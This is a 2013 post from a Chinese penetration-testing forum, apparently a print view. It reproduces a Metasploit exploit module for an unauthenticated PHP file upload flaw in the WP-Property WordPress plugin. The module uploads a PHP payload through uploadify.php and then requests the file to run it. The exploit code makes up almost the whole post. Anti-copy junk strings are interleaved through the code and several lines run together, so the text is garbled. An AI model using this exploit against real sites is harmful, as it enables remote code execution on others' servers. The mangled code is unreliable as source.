中国网络渗透测试联盟

标题: WordPress WP-Property PHP 文件上传漏洞 [打印本页]
作者: admin    时间: 2013-1-4 19:51
标题: WordPress WP-Property PHP 文件上传漏洞
WordPress WP-Property PHP 文件上传漏洞
3 {4 P6 ~0 W$ U' m. Y& L; m( @5 C6 d1 C( }
## # This file is part of the Metasploit Framework and may be subject to/ \" N' g- ?- U% M9 d6 Q5 m# R' x

6 @* T" T9 L2 l: L$ l# L6 K# redistribution and commercial restrictions. Please see the Metasploit
' ~8 ]+ Z& \) \) w. |
- m( O5 `$ j' G* p9 e# Framework web site for more information on licensing and terms of use.
0 _4 M: S$ x- U
! {" C" I: `$ z( \. U* c#   http://metasploit.com/framework/ ##
( ~# S' i5 N8 {4 H5 n  o/ \5 \* \5 X" j( q0 @# N- i

( ?% ^% ]! i. M; x9 A  Y4 u/ ~' ]4 V- K! Z
$ s1 ^( B! c. T- H& o! r! b
1 M5 x, F6 R: |7 E1 ]+ |, h) R
require 'msf/core'
" I+ F- d9 k) k8 `: y6 c$ srequire 'msf/core/exploit/php_exe'% b$ A5 K& |4 q7 G

: d" G' C  N5 J5 T# x9 ?class Metasploit3 < Msf::Exploit::Remote     Rank = ExcellentRanking       include Msf::Exploit::Remote::HttpClient     include Msf::Exploit:hpEXE       def initialize(info = {})         super(update_info(info,             'Name'           => 'WordPress WP-Property PHP File Upload Vulnerability',
% S* O  x1 ?' N" g. K% U- W: Z'Description'    => %q{5 Z4 t+ U% |3 h: c! m6 o
This module exploits a vulnerability found in WP-Property <= 1.35.0 WordPress                 plugin. By abusing the uploadify.php file, a malicious user can upload a file to a                 temp directory without authentication, which results in arbitrary code execution.             },             'Author'         =>
# T+ ]& U6 y9 ]9 \3 U8 Y[" [# V* W' N( q9 @
'Sammy FORGIT', # initial discovery
/ y/ j! n, E/ _/ e! g'James Fitts <fitts.james[at]gmail.com>' # metasploit module
% w* ]% a( h& p- X5 P8 U; m- Y+ E+ T],
( J; P, g# Z2 f& k) v'License'        => MSF_LICENSE,- A1 o5 b) t9 E( M2 ~' X
'References'     =>& S* d4 Y+ A  t# X7 s* q
[4 W; u3 w* K& F- I& g; q* J! O! w
[ 'OSVDB', '82656' ],
7 L' E; R  e8 a* I& x+ t[ 'BID', '53787' ],
! P& A8 N% b# O/ B. `  b6 V+ E[ 'EDB', '18987'],. J9 {/ ]" U9 A0 W2 b5 e
[ 'URL', 'http://www.opensyscom.fr/Actualites/wordpress-plugins-wp-property-shell-upload-vulnerability.html' ]
/ ]5 D1 c: E% T$ }5 V" A4 R9 k],- c' f+ ^$ ^1 K8 O* K3 p
'Payload'        =>  t5 L/ b% N9 [7 M+ C6 A
{
6 T1 v1 |  K2 j3 e# c' i'BadChars' => "\x00",
8 F) Z- c, I4 L  i- O},
9 {' e7 e/ }: }9 D'Platform'       => 'php',# n% J& H. |+ T0 R
'Arch'           => ARCH_PHP,6 v( `6 j3 [& K' f
'Targets'        =>
- Y1 f5 {. Y& n. @) U[
# G1 A  b5 c% j9 i0 o4 ?[ 'Generic (PHP Payload)', { 'Arch' => ARCH_PHP, 'Platform' => 'php' } ],
- b0 E) m) i; v+ J: O[ 'Linux x86', { 'Arch' => ARCH_X86, 'Platform' => 'linux' } ]
8 P/ H6 F2 Z$ ^# `. |/ c4 h" C],
' J2 d+ k+ M# |9 C8 D6 z'DefaultTarget'  => 0,! T4 N4 Z! C7 |. k+ Q9 k
'DisclosureDate' => 'Mar 26 2012'))
7 _8 q* g% H4 u! R- z- q/ z0 Y/ G' t8 Q+ _. R' n
register_options(
9 j  m6 t! [, b# ]  R1 z3 f5 }- O[
' e- u9 R, n+ D; I6 x- [8 ^* lOptString.new('TARGETURI', [true, 'The full URI path to WordPress', '/wordpress'])
4 r2 Q& _* ^. G, u0 `# g- k$ J3 p$ @], self.class)
3 w9 R# G8 E$ ]* bend
. l) ]$ D8 T6 }: b' d. z; `8 }' _2 D; {  \) n
def check
! w5 h0 X8 U5 }uri =  target_uri.path
" a9 ^+ @1 B- ~1 u$ P; v: Puri << '/' if uri[-1,1] != '/'           res = send_request_cgi({             'method' => 'GET',
; U1 Z1 v+ F) B2 |9 |/ J'uri'    => "#{uri}wp-content/plugins/wp-property/third-party/uploadify/uploadify.php"2 o! |) V3 C6 E2 K, v4 P, \8 I/ U4 W
})( P$ u, Y- \7 a8 j/ P' B5 Y
1 X/ i$ F/ E7 m, e3 M
if not res or res.code != 200* O1 h7 L/ D1 s! S/ q' a. I, h
return Exploit::CheckCode::Unknown* X7 `' N# i% i& n
end
! B8 n( \6 ~- L0 _$ M
; z7 V* m) d0 O4 N1 N* j8 Rreturn Exploit::CheckCode::Appears
( M' O, ^( R& D; r* Xend- O! H+ q) y- t9 p. t
# k. ]+ ^# ]- {$ C+ M6 C" K
def exploit9 T. Z9 u) y' M! E
uri =  target_uri.path# q4 q) L. h$ ^
uri << '/' if uri[-1,1] != '/'           peer = "#{rhost}:#{rport}"           @payload_name = "#{rand_text_alpha(5)}.php"         php_payload = get_write_exec_payload(:unlink_self=>true)6 v9 k6 i8 U& G- E/ h. V+ u
9 Q5 [. m* R. }% n
data = Rex::MIME::Message.new
5 f- Y7 ^; ?3 q' O# {- ^data.add_part(php_payload, "application/octet-stream", nil, "form-data; name=\"Filedata\"; filename=\"#{@payload_name}\"")8 Z! y0 a& M1 A$ m4 M
data.add_part("#{uri}wp-content/plugins/wp-property/third-party/uploadify/", nil, nil, "form-data; name=\"folder\"")
% T, ]1 F& P/ {4 c8 S% Hpost_data = data.to_s.gsub(/^\r\n\-\-\_Part\_/, '--_Part_')
# o5 R* }* H3 b- B1 S, `) @
# S& q) Z$ }) {  [: C% cprint_status("#{peer} - Uploading payload #{@payload_name}")/ l- K2 t1 l+ W6 P; z$ g
res = send_request_cgi({
4 }9 z3 i) D6 v1 Q# P'method' => 'POST'," B! g( N* J% V& n
'uri'    => "#{uri}wp-content/plugins/wp-property/third-party/uploadify/uploadify.php",, `$ W7 J- U. f3 C  Q$ V6 n# k0 z
'ctype'  => "multipart/form-data; boundary=#{data.bound}",
  G+ C( r2 x8 w% b4 ^0 n( f8 j) @'data'   => post_data
$ m- G  T# C) e})
9 l" }+ V' ^- `9 q+ b$ g3 J/ w3 U: E; f- s* ~
if not res or res.code != 200 or res.body !~ /#{@payload_name}/
2 D# a' W" B& u" Z& ?, X- X; d( ofail_with(Exploit::Failure::UnexpectedReply, "#{peer} - Upload failed")
. u4 ~. T3 l3 ~) e" Gend+ q+ l! g$ x+ {

* j7 n( P3 i7 i; K# iupload_uri = res.body: T; y# ^, Y8 n2 e" B
# R) c; v! J8 j  g
print_status("#{peer} - Executing payload #{@payload_name}")) t5 N$ I- ]5 C0 L9 t
res = send_request_raw({
+ I, Z8 ?2 \. j. z4 [8 Y# o1 F'uri'    => upload_uri,
# W% x4 C, ~+ w# O0 }'method' => 'GET'
! b, a6 \& u2 a+ T  S})* y- @/ f, x7 V, P( r7 M
end: j, ~2 |0 _- x( q2 b" \* W
end
2 ?- e/ r7 D% i0 Z0 k2 R) X) u+ t) f. d1 U
不要问我这写的是什么 怎么利用 我是说msf.: U, z4 r" G; j4 P! y+ O

& _0 W# n8 r" P: C2 P! C



欢迎光临 中国网络渗透测试联盟 (https://cobjon.com/) Powered by Discuz! X3.2